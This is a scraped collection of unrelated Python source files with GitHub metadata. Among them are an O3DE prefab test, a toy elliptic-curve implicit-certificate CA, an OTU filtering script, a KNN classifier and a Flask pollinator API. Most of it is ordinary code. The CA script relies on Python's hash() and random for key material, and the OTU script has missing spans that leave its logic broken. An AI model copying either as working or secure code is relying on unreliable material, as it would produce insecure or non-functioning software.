elif lang in ['de', 'deu']:\n                return re.sub(\n                    r'\\b(ein|eine|einen|einem|eines|einer|der|die|das|den|dem|'\n                    r'des)\\b',\n                    ' ',\n                    text,\n                )\n            elif lang in ['ar', 'ara']:\n                # TODO(Pengfei): W605 invalid escape sequence '\\s'\n                return re.sub('\\sال^|ال', ' ', text)  # noqa\n            else:\n                return text\n\n        def white_space_fix(text: str, lang: str) -> str:\n\n            if lang in 
self.MIXED_SEGMENTATION_LANGS:\n tokens = self.mlqa_tokenizer(text)\n else:\n tokens = self.ss_tokenizer(text)\n return ' '.join([t for t in tokens if t.strip() != ''])\n\n def remove_punc(text: str) -> str:\n return ''.join(ch for ch in text if ch not in self.PUNCT)\n\n def lower(text: str) -> str:\n return text.lower()\n\n return white_space_fix(\n remove_articles(remove_punc(lower(s)), language), language\n )\n","repo_name":"pfliu-nlp/ExplainaBoard-Debug","sub_path":"explainaboard/utils/preprocessor.py","file_name":"preprocessor.py","file_ext":"py","file_size_in_byte":4063,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"1299098554","text":"def ReparentPrefab_UnderPrefabAndEntityHierarchies():\n\n from pathlib import Path\n CAR_PREFAB_FILE_NAME = Path(__file__).stem + '_car_prefab'\n WHEEL_PREFAB_FILE_NAME = Path(__file__).stem + '_wheel_prefab'\n DRIVER_PREFAB_FILE_NAME = Path(__file__).stem + '_driver_prefab'\n\n import pyside_utils\n\n @pyside_utils.wrap_async\n async def run_test():\n\n from editor_python_test_tools.editor_entity_utils import EditorEntity\n from editor_python_test_tools.prefab_utils import Prefab\n from editor_python_test_tools.wait_utils import PrefabWaiter\n\n import Prefab.tests.PrefabTestUtils as prefab_test_utils\n import azlmbr.legacy.general as general\n\n async def reparent_with_undo_redo(prefab_file_name, prefab_instance, new_parent_entity_id):\n # Get ids for original parent, original container id, and new parent\n original_parent = EditorEntity(prefab_instance.container_entity.get_parent_id())\n original_container_id = prefab_instance.container_entity.id\n new_parent = EditorEntity(new_parent_entity_id)\n\n # Reparent to the new parent\n await prefab_instance.ui_reparent_prefab_instance(new_parent_entity_id)\n\n # Undo the reparent operation, and verify original parent is restored\n general.undo()\n PrefabWaiter.wait_for_propagation()\n original_parent_children_ids = original_parent.get_children_ids()\n new_parent_children_ids = new_parent.get_children_ids()\n instance_id = general.find_editor_entity(prefab_file_name)\n assert instance_id in original_parent_children_ids, \\\n \"Undo failed: Failed to find instance as a child of the original parent.\"\n assert instance_id not in new_parent_children_ids, \\\n \"Undo failed: Unexpectedly still found instance as a child of the new parent.\"\n\n # Redo the reparent operation, and verify the new instance is not among the original parent's child entities\n general.redo()\n PrefabWaiter.wait_for_propagation()\n original_parent_children_ids = original_parent.get_children_ids()\n new_parent_children_ids = new_parent.get_children_ids()\n instance_id = general.find_editor_entity(prefab_file_name)\n assert instance_id not in original_parent_children_ids, \\\n \"Redo failed: Unexpectedly found prefab instance as a child of the original parent.\"\n assert instance_id in new_parent_children_ids, \\\n \"Redo failed: Failed to find instance as a child of the new parent.\"\n\n prefab_test_utils.open_base_tests_level()\n\n # Creates a new car entity at the root level\n car_entity = EditorEntity.create_editor_entity()\n car_prefab_entities = [car_entity]\n\n # Creates a prefab from the car entity\n _, car = Prefab.create_prefab(car_prefab_entities, CAR_PREFAB_FILE_NAME)\n\n # Creates another new wheel entity at the root level\n wheel_entity = EditorEntity.create_editor_entity()\n wheel_prefab_entities = [wheel_entity]\n\n # Creates another prefab from the wheel entity\n _, 
wheel = Prefab.create_prefab(wheel_prefab_entities, WHEEL_PREFAB_FILE_NAME)\n\n        # Creates another new driver entity at the root level\n        driver_entity = EditorEntity.create_editor_entity()\n        driver_prefab_entities = [driver_entity]\n\n        # Creates another prefab from the driver entity\n        _, driver = Prefab.create_prefab(driver_prefab_entities, DRIVER_PREFAB_FILE_NAME)\n\n        # Creates a few new entity hierarchies starting at the root level\n        non_prefab_entity = EditorEntity.create_editor_entity(\"Non-Prefab Entity\")\n        non_prefab_parent_entity = EditorEntity.create_editor_entity(\"Non-Prefab Parent Entity\")\n        non_prefab_child_entity = EditorEntity.create_editor_entity(\"Non-Prefab Child Entity\",\n                                                                    non_prefab_parent_entity.id)\n\n        # Ensure focus gets set on the prefab you want to parent under. This mirrors how users would do\n        # reparenting in the editor.\n        car.container_entity.focus_on_owning_prefab()\n\n        # Reparents the wheel prefab instance to the container entity of the car prefab instance\n        await reparent_with_undo_redo(WHEEL_PREFAB_FILE_NAME, wheel, car.container_entity.id)\n\n        # Reparents the driver instance to the container entity of the now nested car/wheel prefab\n        wheel.container_entity.focus_on_owning_prefab()\n        await reparent_with_undo_redo(DRIVER_PREFAB_FILE_NAME, driver, wheel.container_entity.id)\n\n        # Reparents the wheel prefab instance to the non-prefab entity at the root level\n        non_prefab_entity.focus_on_owning_prefab()\n        await reparent_with_undo_redo(WHEEL_PREFAB_FILE_NAME, wheel, non_prefab_entity.id)\n\n        # Reparents the wheel prefab instance to the child entity of the non-prefab entity hierarchy\n        non_prefab_child_entity.focus_on_owning_prefab()\n        await reparent_with_undo_redo(WHEEL_PREFAB_FILE_NAME, wheel, non_prefab_child_entity.id)\n\n    run_test()\n\n\nif __name__ == \"__main__\":\n    from editor_python_test_tools.utils import Report\n    Report.start_test(ReparentPrefab_UnderPrefabAndEntityHierarchies)\n","repo_name":"LaLiszka/Game-engine","sub_path":"AutomatedTesting/Gem/PythonTests/Prefab/tests/reparent_prefab/ReparentPrefab_UnderPrefabAndEntityHierarchies.py","file_name":"ReparentPrefab_UnderPrefabAndEntityHierarchies.py","file_ext":"py","file_size_in_byte":5356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"14275074726","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCA Implicit Certificate EC\n\"\"\"\n\nimport datetime\nfrom fastecdsa.point import Point\nfrom fastecdsa import keys, curve, ecdsa\nfrom fastecdsa.keys import export_key, gen_keypair\nfrom fastecdsa.keys import import_key\nimport random\n\ndef setCurve(a):\n\n    if a == 0: \n        curva = curve.P192\n    if a == 1: \n        curva = curve.P224\n    if a == 2: \n        curva = curve.P256\n    if a == 3: \n        curva = curve.P384\n    if a == 4: \n        curva = curve.P521\n    if a == 5: \n        curva = curve.secp192k1\n    if a == 6: \n        curva = curve.secp224k1\n    if a == 7: \n        curva = curve.secp256k1\n    \n    timeInit = datetime.datetime.now()\n    \n    # Curve parameters\n    n = curva.p\n    d = curva.G\n    q = random.randint(1,n)\n    \n    # Device id\n    disp = \"DispositivoA\"\n    \n    # Device state or province\n    state = \"Bogota\"\n    \n    # Device city\n    city = \"Bogota\"\n    \n    # Device organization\n    org = \"Uniandes\"\n    \n    # Device domain\n    dom = \"Uniandes.edu.co\"\n    \n    # Device A generates point R\n    priv_keyA, pub_keyA = keys.gen_keypair(curva)\n    R = Point(pub_keyA.x, pub_keyA.y, curva)\n    \n    # CA key pair\n    priv_keyCA, pub_keyCA = keys.gen_keypair(curva)\n    \n    # CA generates an integer q\n    Q = d * q\n\n    # Sum Q + R\n    D = Q + R\n    \n    # Certificate issue date\n    expedicion = datetime.datetime.utcnow()\n\n    # Certificate expiration date\n    expiracion = datetime.datetime.utcnow() + datetime.timedelta(days=30)\n    \n    # Build the implicit certificate (IC)\n    IC = disp+\"-\"+state+\"-\"+city+\"-\"+org+\"-\"+dom+\"-\"+str(D)+\"-\"+str(expedicion)+\"-\"+str(expiracion)\n    hIC = hash(IC)\n    \n    # Build the implicit signature from which A derives its private key\n    s = (hIC*q)+priv_keyCA\n    \n    timeFin = datetime.datetime.now()\n    time = timeFin - timeInit\n    string = str(time)+\" - \"+curva.name\n    print(string)\n    return string\n","repo_name":"jjmartinezc/Certificate","sub_path":"CA.py","file_name":"CA.py","file_ext":"py","file_size_in_byte":2015,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"38323147406","text":"#!/usr/bin/python\nimport sys\nimport re\nimport os\n\n\"\"\"\nFilter OTUs from BIOM files\n(1)In all samples, average relative abundance=1/average reads per sample\n(2)In each treatment group, average relative abundance=sum rel/number of samples in the group\n(3)Criteria: \navg_rel_group=(sum of rel in this group)/number of samples in this group\ndetectable_rel_avg=1/(average number of read of all samples)\nAt least in one group avg_rel_group>=detectable_rel_avg\n\"\"\"\ndef get_taxa_otus(file,out_fh):\n\tin_fh=open(file,'r')\n\tcount=0\n\tfor line in in_fh:\n\t\tcount=count+1\n\t\tline=line.rstrip('\\n')\n\t\tlist=line.split('\\t',)\n\t\tif count<=2:\n\t\t\tout_fh.write(line+'\\n')\n\t\t\tif count==2:\n\t\t\t\tfor i,v in enumerate(list):\n\t\t\t\t\tif i>0 and i=avg_rel:\n\t\t\t\tflag_good_otu=1\n\t\t\n\t\t\n\t\t#Print out OTUs, which pass filter cutoff\n\t\t#At least one group\n\t\tif flag_good_otu==1:\n\t\t\ttaxa_out_fh.write(id)\n\t\t\tfor i,v in enumerate(dict_otu[id]):\n\t\t\t\ttaxa_out_fh.write('\\t'+str(dict_otu[id][i]))\n\t\t\ttaxa_out_fh.write('\\n')\n\n\treturn\n\n\n\"\"\"\nMain functions\n\"\"\"\nif len( sys.argv ) != 4:\n    raise Exception( \"Usage: filter_0.03Cluster_TaxaTable.py <taxa_otu_infile> <taxa_otu_outfile> <design_file>\")\n\ntaxa_otu_infile=sys.argv[1]\ntaxa_otu_outfile=sys.argv[2]\ndesign_file=sys.argv[3]\n\n\n#Process OTUs table with taxonomic information\ntaxa_out_fh=open(taxa_otu_outfile,'w')\n#Key:OTU id\n#Values(list):all samples,[-1]taxonomy\ndict_otu={}\n#value:sampleID/total number of reads\nlist_samples=[]\nget_taxa_otus(taxa_otu_infile,taxa_out_fh)\n\n#Calculate relative abundance for each sample in each OTU\n#Key:OTU id \n#Values(list):all samples of relative abundance\ndict_otu_rel={}\nfor id,value in dict_otu.items():\n\tfor i,iv in enumerate(dict_otu[id]):\n\t\t#Last column is taxonomy information\n\t\tif i==len(dict_otu[id])-1:\n\t\t\tbreak\n\t\trel_value=float(dict_otu[id][i])/float(list_samples[i][1])\n\t\tif id in dict_otu_rel:\n\t\t\tdict_otu_rel[id].append(rel_value)\n\t\telse:\n\t\t\tdict_otu_rel[id]=[rel_value,]\n\n\n#Calculate the average relative abundance\nsum=0\ncount_samples=len(list_samples)\nfor i,iv in enumerate(list_samples):\n\tsum=sum+list_samples[i][1]\navg_ab=float(sum)/float(count_samples)\navg_rel=float(1)/avg_ab\n#print avg_ab\n#print avg_rel
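\n#e.g. three samples with 1000, 2000 and 3000 reads give avg_ab=2000.0,\n#so an OTU is considered detectable at relative abundance avg_rel=1/2000=0.0005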
\n\n#Get design file information\n#Key:sampleID\n#Value:group\ndict_design_samples={}\n#Key:groupID\n#Value:1\ndict_design={}\nget_design_info(design_file)\n\n#Filter OTUs according to the rule\nfilter_taxa_otus(taxa_out_fh)\ntaxa_out_fh.close()\n\n\nquit()\n","repo_name":"chemokine/16sMothurPipeline","sub_path":"filter_0.03Cluster_TaxaTable.py","file_name":"filter_0.03Cluster_TaxaTable.py","file_ext":"py","file_size_in_byte":3642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"32060601448","text":"import random\nfrom operator import attrgetter\n\nfrom engine import Game\nfrom players.interactive_player import InteractivePlayer\nfrom players.player import Player\nfrom user_actions import *\n\ndef _get_action_of_type(a_type, actions):\n    for a in actions:\n        if isinstance(a, a_type):\n            yield a\n\n\nclass SimplePolicy:\n    def simple_pile_policy(self, p, action, piles, min_n, max_n):\n        if action == 'destory':\n            # choose base/outpost with highest health to destroy\n            return piles[0], sorted(piles[0], key=attrgetter('defence'), reverse=True)[:max_n]\n        elif action == 'discard':\n            # discard cheapest cards\n            return piles[0], sorted(piles[0], key=attrgetter('cost'))[:min_n]\n        elif action == 'discard_draw':\n            # cycle cheap cards\n            return piles[0], [c for c in piles[0] if c.cost == 1][:max_n]\n        elif action == 'scrap':\n            if piles[0].name == 'trade':\n                # we don't scrap from trade row\n                return None, None\n\n            try:\n                discard_p = next(p for p in piles if p.name=='discard')\n                if min_n == 0:\n                    # return only cheap cards\n                    return discard_p, [c for c in discard_p if c.cost == 1][:max_n]\n                else:\n                    return discard_p, sorted(discard_p, key=attrgetter('cost'))[:min_n]\n            except StopIteration:\n                pass  # no discard\n\n            hand_p = piles[0]\n            if min_n == 0:\n                return None, None\n            else:\n                return hand_p, sorted(hand_p, key=attrgetter('cost'))[:min_n]\n        elif action == 'buy':\n            # buy most expensive, but only if cost > 3\n            c = max(piles[0], key=attrgetter('cost'))\n            if c.cost > 3:\n                return piles[0], [c]\n            else:\n                return None, None\n\n\n    def simple_action_policy(self, p1: Player, game, p2, actions):\n        from actions import ActionDiscardAndDraw, ActionDrawThenScrap, ActionScarpDrawCard\n\n        # first play bases\n        for base_a in _get_action_of_type(UserActionPlayCard, actions):\n            if isinstance(base_a.card, (BaseCard, OutpostCard)):\n                return base_a\n\n        # optional discard/scrap actions\n        for discard_a in _get_action_of_type(UserActionCardAction, actions):\n            if isinstance(discard_a, (ActionDiscardAndDraw, ActionDrawThenScrap)):\n                if any(c.cost == 1 for c in p1.hand):\n                    return discard_a\n            if isinstance(discard_a, ActionScarpDrawCard):\n                if any(c.cost == 1 for c in p1.discard_pile):\n                    return discard_a\n\n        # play all cards\n        for a in _get_action_of_type(UserActionPlayCard, actions):\n            return a\n\n        # other optional actions\n\n        # buy good cards\n        buys = list(_get_action_of_type(UserActionBuyCard, actions))\n        if buys:\n            b = self.choose_buy_actions(game, p1, p2, buys)\n            if b:\n                return b\n\n        # do damage\n        outposts = sorted(_get_action_of_type(UserActionAttackOutpost, actions), key=lambda a: a.outpost.defence, reverse=True)\n        if outposts:\n            return outposts[0]\n\n        bases = sorted(_get_action_of_type(UserActionAttackBase, actions), key=lambda a: a.base.defence, reverse=True)\n        if bases:\n            return bases[0]\n\n        for a in _get_action_of_type(UserActionAttackFace, actions):\n            return a\n\n        for a in _get_action_of_type(UserActionDone, actions):\n            return a\n\n        return random.choice(actions)\n\n    def choose_buy_actions(self, game, p1, p2, buys):\n        card_to_action = {a.card: a for a 
in buys}\n        c = self.choose_buy_card(game, p1, p2, list(card_to_action.keys()))\n        if c:\n            return card_to_action[c]\n\n    def choose_buy_card(self, game, p1, p2, cards):\n        # buy most expensive\n        b = max(cards, key=attrgetter('cost'))\n        return b\n\nclass SimplePlayer(Player, SimplePolicy):\n    def choose_action(self, b, p_other, actions):\n        return self.simple_action_policy(self, b, p_other, actions)\n\n    choose_card_action = choose_action\n\n    def do_choose_from_piles(self, action, piles, min_n, max_n):\n        return self.simple_pile_policy(self, action, piles, min_n, max_n)\n\nif __name__ == '__main__':\n    p1 = InteractivePlayer('p1')\n    p2 = SimplePlayer('p2')\n    g = Game(players=[p1, p2])\n    winner = g.run()","repo_name":"shinbet/star_realms","sub_path":"players/simple.py","file_name":"simple.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"}
+{"seq_id":"1920386233","text":"from athanor.classes.scripts import AthanorScript\nfrom athanor.utils.text import sanitize_string, partial_match, sanitize_group_name\nfrom athanor.groups.models import GroupTier, Group\n\n\nclass GroupManager(AthanorScript):\n\n    def at_script_creation(self):\n        self.key = \"Group Manager\"\n        self.desc = \"Organizes Groups\"\n\n    def at_start(self):\n        GroupTier.objects.get_or_create(number=0,private=False)\n        GroupTier.objects.get_or_create(number=0,private=True)\n\n    def find_tier(self,number,private):\n        try:\n            number = int(number)\n        except:\n            raise ValueError(\"Must enter a Number for tier!\")\n        private = bool(private)\n        tier = GroupTier.objects.filter(number=number,private=private).first()\n        if not tier:\n            raise ValueError(\"Tier not found!\")\n        return tier\n\n    def create_tier(self,number,name,private):\n        try:\n            number = int(number)\n        except:\n            raise ValueError(\"Must enter a Number for tier!\")\n        name = sanitize_group_name(name)\n        private = bool(private)\n\n        if GroupTier.objects.filter(number=number,private=private).count():\n            raise ValueError(\"Tier already exists!\")\n\n        if GroupTier.objects.filter(name__iexact=name,private=private).count():\n            raise ValueError(\"Tier name already in use!\")\n\n        tier, created = GroupTier.objects.get_or_create(number=number,name=name,private=private)\n        return tier\n\n    def rename_tier(self, number, private, new_name):\n        tier = self.find_tier(number,private)\n        new_name = sanitize_group_name(new_name)\n\n        if GroupTier.objects.filter(name__iexact=new_name,private=private).count():\n            raise ValueError(\"Tier name already in use!\")\n\n        tier.name = new_name\n        tier.save(update_fields=['name'])\n\n    def display(self, viewer, private):\n        message = list()\n        message.append(viewer.render.header(\"%s Groups\" % (\"Private\" if private else \"Public\")))\n        head_table = viewer.render.make_table([\"Name\", \"Leader\", \"Second\", \"Conn\"],\n                                              header=False, width=[30, 21, 21, 8])\n        message.append(head_table)\n        for tier in GroupTier.objects.filter(private=private).order_by('number'):\n            message.append(tier.display(viewer,footer=False))\n        message.append(viewer.render.footer())\n        return message\n\n    def create_group(self, name, tier_number, private):\n        name = sanitize_group_name(name)\n        tier = self.find_tier(tier_number, private)\n        if Group.objects.filter(key__iexact=name).first():\n            raise ValueError(\"Group already exists! 
Names must be unique.\")\n group = Group.objects.create(tier=tier,key=name)\n return group\n\n def find_group(self, viewer, name, ignore_permissions=False):\n groups = Group.objects.all().order('key')\n if not ignore_permissions:\n groups = [group for group in groups if group.visible_to(viewer)]\n name = sanitize_group_name(name)\n group = partial_match(name, groups)\n if not group:\n raise ValueError(\"Group '%s' not found!\" % name)\n return group\n\n def rename_group(self, viewer, name, new_name):\n group = self.find_group(viewer, name)\n new_name = sanitize_group_name(new_name)\n exist = Group.objects.filter(key__iexact=new_name).exclude(id=group.id)\n if exist:\n raise ValueError(\"Group names must be unique!\")\n group.key = new_name\n group.save(update_fields=['key'])\n group.setup_channels()\n\n def change_tier(self, viewer, name, new_tier, private):\n tier = self.find_tier(new_tier, private)\n group = self.find_group(viewer, name)\n group.tier = tier\n group.save(update_fields=['tier'])\n\n def disband_group(self, viewer, name, confirm_name):\n group = self.find_group(viewer, name)\n confirm_name = sanitize_string(confirm_name)\n if not Group.objects.filter(id=group.id, key__iexact=confirm_name).count():\n raise ValueError(\"Must enter the group's full case-insensitive name to continue!\")\n if not group.check_permission(viewer, 'admin'):\n raise ValueError(\"Permission denied!\")\n group.delete()","repo_name":"castlelorestudios/athanor","sub_path":"athanor_groups/scripts.py","file_name":"scripts.py","file_ext":"py","file_size_in_byte":4297,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10266850982","text":"from __future__ import with_statement\nimport sys\nfrom lxml import etree\n\nsys.path.append('..')\nfrom lightning_svg import LightningSvg\n\nclass LightningElement(object):\n def __init__(self, html, css, div, anims):\n self.html = html\n self.css = css\n self.div = div\n self.anims = anims\n\ndef composite(baseElm, newdiv):\n for elm in baseElm.iterfind('.//div'):\n if elm.get('id') == 'body':\n elm.getparent().replace(elm, etree.fromstring(newdiv))\n return baseElm\n\ndef get_lightning_element(filepath, mcname, key_prefix):\n with open(filepath, 'r') as f:\n return LightningElement(*(LightningSvg().xml2svg(f, mcname=mcname, key_prefix=key_prefix, has_anim_name=False, scale=1.0)))\n\ndef composite_html(base, part, output_path):\n comp_div = composite(etree.fromstring(base.div), part.div)\n html = LightningSvg().make_html(etree.tostring(comp_div), base.css+part.css, part.anims)\n with open(output_path, 'w') as f:\n f.write(html)\n\nif __name__ == '__main__':\n base_element = get_lightning_element('sample_base.xml', mcname=None, key_prefix='base')\n myobj1_element = get_lightning_element('sample1.xml', mcname='body', key_prefix='myobj1')\n myobj2_element = get_lightning_element('sample2.xml', mcname='body', key_prefix='myobj2')\n\n composite_html(base_element, myobj1_element, 'merged1.html')\n composite_html(base_element, myobj2_element, 'merged2.html')\n\n","repo_name":"geishatokyo-lightning/lightning","sub_path":"lightning_core/sample/composite.py","file_name":"composite.py","file_ext":"py","file_size_in_byte":1437,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"27"} +{"seq_id":"34612400008","text":"import numpy as np\nimport random\nimport os\nfrom collections import OrderedDict\nimport tensorflow as tf\n\nclass Loader():\n def __init__(self, dataset = 
\"Left_Foot\", num_samples_per_direction = 100, sample_size = 350, shuffle = True ):\n self.dataset = dataset\n self.dataset_path = os.path.join(\"python_model_training/data/npy/\",self.dataset)\n self.sample_size = sample_size\n self.num_samples_per_direction = num_samples_per_direction\n self.shuffle = shuffle\n if self.dataset == \"Left_Foot\": self.labels = ['lf_front','lf_frontLeft','lf_left','lf_bottomLeft','lf_bottom']\n elif self.dataset == \"Right_Foot\": self.labels = ['rf_front','rf_frontRight','rf_right','rf_bottomRight','rf_bottom']\n self.data = OrderedDict()\n self.data[self.labels[0]] = np.load(os.path.join(self.dataset_path,self.labels[0]+'.npy')) \n self.data[self.labels[1]] = np.load(os.path.join(self.dataset_path,self.labels[1]+'.npy')) \n self.data[self.labels[2]] = np.load(os.path.join(self.dataset_path,self.labels[2]+'.npy')) \n self.data[self.labels[3]] = np.load(os.path.join(self.dataset_path,self.labels[3]+'.npy')) \n self.data[self.labels[4]] = np.load(os.path.join(self.dataset_path,self.labels[4]+'.npy')) \n if(self.dataset == \"Left_Foot\"):\n self.test_data = OrderedDict()\n self.test_data[self.labels[0]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_front.npy\"))\n self.test_data[self.labels[1]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_frontLeft.npy\"))\n self.test_data[self.labels[2]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_left.npy\"))\n self.test_data[self.labels[3]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_bottomLeft.npy\"))\n self.test_data[self.labels[4]] = np.load(os.path.join(\"python_model_training/data/npy/Left_Foot_Valid\", \"lf_valid_bottom.npy\"))\n\n def load(self):\n label_idx = [0,1,2,3,4]\n N, H, W = self.num_samples_per_direction*len(label_idx), self.sample_size, 7\n all_data = np.empty((N,H,W))\n all_labels = []\n N_ = 0\n for i in range(N):\n random.shuffle(label_idx)\n for idx, label in enumerate(label_idx):\n all_data[N_,:H,:] = tf.keras.utils.normalize(self.data[self.labels[label]][i,:H,:W])\n all_labels.append(label)\n N_+=1\n if N_ == N: break\n train_data = np.array(all_data[:400,:,:])\n train_labels = np.array(all_labels[:400])\n val_data = np.array(all_data[400:,:,:])\n val_labels = np.array(all_labels[400:])\n return train_data, train_labels, val_data, val_labels\n\n if(self.dataset == \"Left_Foot\"):\n test_label_idx = [0,1,2,3,4]\n N, H, W = 20*len(test_label_idx), self.sample_size, 7 #self.num_samples_per_direction\n print(N,H,W)\n all_test_data = np.empty((N,H,W))\n all_test_labels = []\n N_ = 0\n for i in range(N):\n random.shuffle(test_label_idx)\n for idx, label in enumerate(test_label_idx):\n all_test_data[N_,:H,:] = tf.keras.utils.normalize(self.test_data[self.labels[label]][i,:H,:W])\n all_test_labels.append(label)\n N_+=1\n if N_ == N: break\n test_data = np.array(all_test_data)\n test_labels = np.array(all_test_labels)\n\n return train_data, train_labels, val_data, val_labels, test_data, test_labels\n\n\n# lf_loader = Loader()\n# train_data, train_labels, val_data, val_labels, test_data, test_labels = lf_loader.load()\n# print(train_data.shape, train_labels.shape, val_data.shape, val_labels.shape, test_data.shape, 
\n\n# lf_loader = Loader()\n# train_data, train_labels, val_data, val_labels, test_data, test_labels = lf_loader.load()\n# print(train_data.shape, train_labels.shape, val_data.shape, val_labels.shape, test_data.shape, test_labels.shape)","repo_name":"carlodizon03/Insole-classification","sub_path":"python_model_training/dataLoader.py","file_name":"dataLoader.py","file_ext":"py","file_size_in_byte":3936,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"36456529505","text":"# -*- coding: utf-8 -*-\nimport numpy as np\nfrom scipy.spatial import distance\n\ndef KNN_test(X_train,Y_train,X_test,Y_test,K):\n    \n    n_train = len(X_train)\n    n_test = len(X_test)\n    \n    dist = np.zeros(n_train)\n    \n    acc_pred = 0\n    for i in range(n_test):\n        # distance from test point i to every training point j\n        for j in range(n_train):\n            dist[j] = distance.euclidean(X_train[j],X_test[i])\n        \n        index_train = np.argsort(dist)\n        sum=0\n        for k in range(K):\n            sum = sum + Y_train[index_train[k]]\n            # print(dist[index_train[k]], \" Y: \", Y_train[index_train[k]], \" SUM: \", sum)\n        \n        if sum > 0:\n            y = 1\n        else:\n            y = -1\n        \n        if Y_test[i] == y:\n            acc_pred += 1\n    \n    accuracy = acc_pred / n_test\n    return accuracy\n\ndef choose_K(X_train,Y_train,X_val,Y_val):\n    K = np.zeros(10)\n    for i in range(1, 10, 2):\n        K[i] = KNN_test(X_train,Y_train,X_val,Y_val,i)\n    \n    return K.argmax()\n\n# Illustrative call (placeholder arrays; labels are expected to be +1/-1):\n# best_k = choose_K(X_train, Y_train, X_val, Y_val)\n# acc = KNN_test(X_train, Y_train, X_test, Y_test, best_k)\n","repo_name":"sayedcseku/unr-ml-cs622","sub_path":"Project1/nearest_neighbors.py","file_name":"nearest_neighbors.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"}
+{"seq_id":"2411510296","text":"from flask import Flask, request\n\nfrom flask_cors import CORS\n\n# Docker\nfrom api import predictions\nfrom api import repository\n\n\n# Local\n#from api import predictions\n#from api import repository\n\n\nfrom werkzeug.middleware.proxy_fix import ProxyFix\n\napp = Flask(__name__)\nCORS(app, allow_headers=['Content-Type'])\napp.wsgi_app = ProxyFix(app.wsgi_app, x_proto=1)\n\n\n@app.route(\"/hello\")\ndef hello():\n    return \"
Welcome to BLUE BiCIKL!
\"\n\n\n@app.route(\"/pollinators\")\ndef get_pollinators():\n return repository.get_all_tids(True)\n\n\n@app.route(\"/plants\")\ndef get_plants():\n return repository.get_all_tids(False)\n\n\n@app.route(\"/name\", methods=['GET'])\ndef get_name():\n taxon_id = request.json[\"species\"]\n print(repository.get_taxon_id_from_sci_name(taxon_id))\n\n\n@app.route(\"/pollinatorOf/\", methods=[\"GET\", \"POST\"])\n@app.route(\"/pollinatorOf\", methods=[\"GET\", \"POST\"])\ndef pollinator_of(taxon_id=None):\n # Our given taxa is a plant, we are looking for pollinators of taxon_id\n # Return plants which taxon_id is a pollinator of\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n\n relation = \"pollinates\"\n # Taxon of interest is NOT a subject\n is_subject = False\n strict = False\n\n # Check input args\n confidence = request.args.get(\"confidence\")\n if not confidence:\n confidence = 0.5\n\n if not check_args(confidence): return \"invalid arguments, check confidence is float between 0 and 1\", 400\n\n taxon_info = repository.get_input_taxonomy(taxon_id)\n if not taxon_info:\n return \"Taxon not found\", 404\n\n queried_dict = {\"input\": taxon_info}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n predicted_dict = {\"predicted\": predictions.controller(relation, taxon_id, is_subject, confidence, strict)}\n\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 3033668 -> pollinated by 1340470\n # Aconitium colombianum (colombian monskhood) pollinated by Bombus appositus (bumblebee)\n\n\n@app.route(\"/pollinatedBy/\", methods=[\"GET\", \"POST\"])\n@app.route(\"/pollinatedBy\", methods=[\"GET\", \"POST\"])\ndef pollinated_by(taxon_id=None, confidence=0.95):\n # Given a pollinator, return plants pollinated by the pollinator\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n relation = \"pollinates\"\n is_subject = True\n confidence = request.args.get(\"confidence\")\n if not confidence:\n confidence = 0.5\n\n strict = False\n\n if not check_args(confidence): return \"invalid arguments, check confidence is float between 0 and 1\", 400\n\n taxon_info = repository.get_input_taxonomy(taxon_id)\n if not taxon_info:\n return \"Taxon not found\", 404\n\n queried_dict = {\"input\": taxon_info}\n observed_dict = {\"observed\": repository.get_interactions(taxon_id, relation, is_subject)}\n predicted_dict = {\"predicted\": predictions.controller(relation, taxon_id, is_subject, confidence, strict)}\n\n return {**queried_dict, **observed_dict, **predicted_dict}\n\n # 1340470 -> pollinates 3033668\n # Bombus appositus (bumblebee) pollinates Aconitium colombianum (colombian monskhood)\n\n\n@app.route(\"/predatorOf/\", methods=[\"GET\", \"POST\"])\n@app.route(\"/predatorOf\", methods=[\"GET\", \"POST\"])\ndef predator_of(taxon_id=None):\n if taxon_id is None:\n species_name = request.json[\"species\"]\n if species_name is None:\n return \"\"\n try:\n taxon_id = int(species_name)\n except ValueError:\n taxon_id = repository.get_taxon_id_from_sci_name(species_name)\n relation = \"preysOn\"\n is_subject = False\n\n queried_dict = {\"input\": repository.get_input_taxonomy(taxon_id)}\n observed_dict = 
